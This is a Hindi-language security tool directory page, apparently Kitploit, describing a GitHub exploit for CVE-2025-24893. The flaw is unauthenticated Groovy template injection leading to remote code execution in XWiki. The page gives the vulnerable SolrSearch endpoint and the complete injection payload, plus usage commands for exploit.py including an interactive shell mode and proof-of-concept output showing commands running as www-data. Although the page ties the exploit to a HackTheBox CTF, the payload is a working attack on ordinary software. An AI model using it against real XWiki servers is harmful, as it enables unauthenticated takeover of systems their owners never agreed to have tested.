Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24893-XWiki-SSTI-RCE — CVE-2025-24893 – XWiki SSTI अनप्रमाणित RCE शोषण (HackTheBox CTF) | Kitploit
उपकरण/GitHubGitHub/rippsec/cve-2025-24893-xwiki-ssti-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंग
GitHubrippsec/cve-2025-24893-xwiki-ssti-rce

CVE-2025-24893-XWiki-SSTI-RCE

CVE-2025-24893 – XWiki SSTI अनप्रमाणित RCE शोषण (HackTheBox CTF)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-24893 — XWiki SSTI दूरस्थ कोड निष्पादन

अवलोकन

क्षेत्रविवरण
CVECVE-2025-24893
सॉफ़्टवेयरXWiki
कमज़ोरीसर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) → RCE
प्रमाणीकरणआवश्यक नहीं
CVSS स्कोरगंभीर
संदर्भHackTheBox CTF के दौरान खोजा गया

विवरण

XWiki एक SolrSearch एंडपॉइंट (/xwiki/bin/get/Main/SolrSearch) को उजागर करता है जो बिना स्वच्छता के Groovy टेम्पलेट इंजन के माध्यम से उपयोगकर्ता-आपूर्ति किए गए इनपुट को प्रस्तुत करता है। एक अप्रमाणित हमलावर text क्वेरी पैरामीटर के माध्यम से एक Groovy अभिव्यक्ति इंजेक्ट कर सकता है, जो अंतर्निहित सर्वर पर दूरस्थ कोड निष्पादन प्राप्त करता है।

तकनीकी विवरण

कमज़ोर एंडपॉइंट

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=<PAYLOAD>

इंजेक्शन तंत्र

text पैरामीटर को सीधे XWiki मैक्रो संदर्भ में एम्बेड किया जाता है और Groovy इंजन द्वारा मूल्यांकन किया जाता है। इंजेक्शन }}} का उपयोग करके टेम्पलेट संदर्भ से बच जाता है और एक {{async}}{{groovy}} ब्लॉक खोलता है:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("<CMD>".execute().text){{/groovy}}{{/async}}

आउटपुट RSS प्रतिक्रिया बॉडी में परिलक्षित होता है और regex के माध्यम से निकाला जा सकता है।

पेलोड संरचना

root@kitploit:~
payload = '}}}{{async async=false}}{{groovy}}println("' + command + '".execute().text){{/groovy}}{{/async}}'

प्रतिक्रिया XML/RSS है — कमांड आउटपुट [}}} और ]</ मार्करों के बीच HTML-एनकोडेड वर्णों के साथ दिखाई देता है।

उपयोग

root@kitploit:~
python3 exploit.py -t <TARGET> [-p PORT] [-s] [-i | -c COMMAND]

उदाहरण

root@kitploit:~
# Single command
python3 exploit.py -t wiki.target.htb -c "id"

# Interactive shell
python3 exploit.py -t wiki.target.htb -i

# HTTPS on custom port
python3 exploit.py -t wiki.target.htb -p 443 -s -i

निर्भरताएँ

root@kitploit:~
pip install requests termcolor

प्रमाण अवधारणा का

root@kitploit:~
$ python3 exploit.py -t wiki.editor.htb -c "id"
[*] Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

संदर्भ

  • XWiki आधिकारिक सलाह
  • NVD प्रविष्टि
टूल डाउनलोड करें
फ़्लैगविवरण
-tलक्ष्य होस्टनाम या IP
-pपोर्ट (डिफ़ॉल्ट: 80)
-sHTTPS का उपयोग करें
-iइंटरैक्टिव शेल मोड
-cएकल कमांड निष्पादन
-vवर्बोज़ आउटपुट